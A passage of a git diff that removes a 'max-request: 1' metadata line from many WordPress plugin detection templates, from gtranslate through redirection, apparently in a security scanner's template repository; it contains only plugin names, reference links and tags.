4a76856a69..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: - max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index b321ca63eb..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: - max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 2b42c9f80c..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: - max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index 2409c6b370..a8eca7b056 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: - max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index dbea07a6da..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: - max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 17a8f220cf..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: - max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 956a08b32d..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: - max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5a570b9077..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: - max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 4ecac0cd92..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: - max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e50f58cef8..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: - max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 031bb48563..2ff5adba86 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: - max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 3cdcf3da93..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8881e23860..8e1cb46cf0 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 0bc823830f..c45ef4bf89 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index 7fbeea5917..a224d85727 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: - max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 829edad042..56d2e4efcd 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: 